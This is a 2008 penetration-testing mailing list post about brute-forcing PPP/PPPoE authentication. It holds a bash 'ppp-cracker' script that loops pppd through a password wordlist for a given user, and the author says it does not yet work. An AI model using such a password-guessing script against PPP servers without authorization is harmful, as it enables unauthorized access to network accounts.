Penetration Testing mailing list archives
RE: PPP authentication brute-force attack?
From: Matheus Michels <matheusf_michels () hotmail com>
Date: Wed, 13 Feb 2008 03:06:50 +0000
What about something like that (didn't try it): while read passwd; do pppd call pppd-options password "$passwd" if [ $? -eq 0 ]; then echo "Found password: $passwd" break fi done < /path/to/password-file where "pppd-options" is a file containing pppd's options, and "password-file" contains the passwords, one per line. You probably need the following options in "pppd-options": nodetach maxconnect 5
This is exactly what I wanted. I made this little script based on yours: #!/bin/bash SETSID=/usr/bin/setsid PPPD=/usr/sbin/pppd PPPOE=/usr/sbin/pppoe PPPD_OPTIONS="noipdefault noauth default-asyncmap defaultroute hide-password nodetach usepeerdns mtu 1492 mru 1492 noaccomp noccp nobsdcomp nodeflate nopcomp novj novjccomp lcp-echo-interval 30 lcp-echo-failure 3 pap-max-authreq 2 pap-restart 3 maxconnect 5" PPPOE_OPTIONS="-I eth0" PASSWORDS=/home/matheus/pass.txt if test "$1" = "" ; then echo "$0: Usage: ppp-cracker user">& 2 exit 1 fi while read passwd; do $SETSID $PPPD pty "$PPPOE $PPPOE_OPTIONS" $PPPD_OPTIONS user "$1" password "$passwd" if [ $? -eq 0 ]; then echo "Found password: $passwd" break fi done < $PASSWORDS I've copied some parts from the adsl-start and adsl-connect scripts. Actually, the script is not functional yet. It authenticates and, some seconds later, exits with an input/output error. But I'm doing some changes based on the scripts shipped with RP-PPPOE and I'm almost getting the script to work. Thank you very much! _________________________________________________________________ Helping your favorite cause is as easy as instant messaging. You IM, we give. http://im.live.com/Messenger/IM/Home/?source=text_hotmail_join ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- testing an installer, (continued)
- testing an installer Qazi, Reema (Feb 25)
- Re: testing an installer Kelly Keeton (Feb 25)
- RE: testing an installer Bob Woods (Feb 25)
- Re: testing an installer Kurt Buff (Feb 25)
- RE: testing an installer Thor (Hammer of God) (Feb 25)
- Re: testing an installer Amar Kulo (Feb 25)
- RE: testing an installer Jarmon, Don R (Feb 25)
- Re: testing an installer Erik Harrison (Feb 26)
- Re: testing an installer Predrag Petrović (Feb 26)
- Re: testing an installer Paul Slade (Feb 27)
- Message not available
- RE: PPP authentication brute-force attack? Matheus Michels (Feb 14)
- Re: PPP authentication brute-force attack? Bartos-Elekes Zsolt (Feb 14)